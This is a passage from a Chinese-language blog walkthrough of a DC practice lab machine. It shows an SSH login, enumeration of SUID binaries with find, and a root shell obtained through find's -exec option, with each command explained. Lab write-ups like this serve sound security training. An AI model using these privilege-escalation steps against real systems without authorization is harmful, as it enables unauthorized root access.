<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh flag4@192.168.228.132</span><br></pre></td></tr></table></figure>

<p>连接成功，查看flag</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603713182-61.png" alt="Image"></p>
<p>提示我们去root里面找flag</p>
<h2 id="五-Linux提权"><a href="#五-Linux提权" class="headerlink" title="五.Linux提权"></a>五.Linux提权</h2><p>需要用到SUID提权，参考 <a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/272617.html">简谈SUID提权 - FreeBuf网络安全行业门户</a></p>
<p>利用find命令，找查具有SUID权限的可执行二进制文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -type f 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p>这个命令的作用是在根目录 <strong>&#x2F;</strong> 下查找所有文件，如果文件的用户 ID 位设置为 SUID（SUID 是 setuid 的缩写，表示当该程序运行时将以拥有者的权限运行），则列出它们的文件名。并且将所有标准错误输出到 <strong>&#x2F;dev&#x2F;null</strong> 中，以避免在屏幕上显示不必要的错误信息。</p>
<p>下面是各个参数的解释：</p>
<ul>
<li><strong>find</strong>: 命令名，用于在指定的路径下查找文件和目录。</li>
<li><strong>&#x2F;</strong>: 查找的路径，本例中是根目录。</li>
<li><strong>-perm</strong>: 参数选项，用于按照文件权限查找文件。</li>
<li><strong>-u&#x3D;s</strong>: 参数选项，用于查找文件的用户 ID 位设置为 SUID（即文件所有者执行时具有其权限）的文件。<strong>u</strong> 表示用户（user），**&#x3D;** 表示精确匹配，<strong>s</strong> 表示设置了 SUID。</li>
<li><strong>-type</strong>: 参数选项，用于指定要查找的文件类型，<strong>f</strong> 表示查找普通文件（即不包括目录和链接等其他类型的文件）。</li>
<li><strong>2&gt;&#x2F;dev&#x2F;null</strong>: 将标准错误输出重定向到 <strong>&#x2F;dev&#x2F;null</strong> 设备，即将错误信息丢弃不予显示。</li>
</ul>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603765887-63.png" alt="Image"></p>
<p>find比较常用，可以执行root权限的命令找查文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -name index.php -exec &quot;/bin/sh&quot; \;</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603811035-65.png" alt="Image"></p>
<p>可以看到我们已经是root权限了</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715603836711-67.png" alt="Image"></p>
<p>拿到最终的flag</p>

            </div>

            <!-- Comments -->
            
                <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                    


                </div>
            
        </div>
        <!-- Tags and categories -->
        
        <div class="row justify-content-between article-taxonomy">
            <div class="col-lg-4 col-lg-offset-2 col-md-5 col-md-offset-1">
                
                    


<a href="/tags/DC靶场/" class="text-decoration-none text-secondary">#DC靶场</a>


                
            </div>
            <div class="col-lg-4 col-md-5 text-end">
                
            </div>
        </div>
        

    </div>
</article>



        <footer class="site-footer">
      <div class="container">
        <div class="site-footer-inner">
          <div class="footer-copy">Copyright 2024 evabd21 | Security notes with a cleaner presentation.</div>
          <div class="footer-links">
            <a href="/getting-start">About</a>
            <a href="/archives">Archives</a>
            <a target="_blank" rel="noopener" href="https://github.com/evabd21/evabd21.github.io">Github</a>
          </div>
        </div>
      </div>
    </footer>
  </div>


    <!-- After footer scripts -->
    <!-- Disqus Comments -->



   

<!-- hexo injector body_end start --><script src="https://cdn.jsdelivr.net/npm/bs5-lightbox@1.8.3/dist/index.bundle.min.js"></script><!-- hexo injector body_end end --></body>

</html>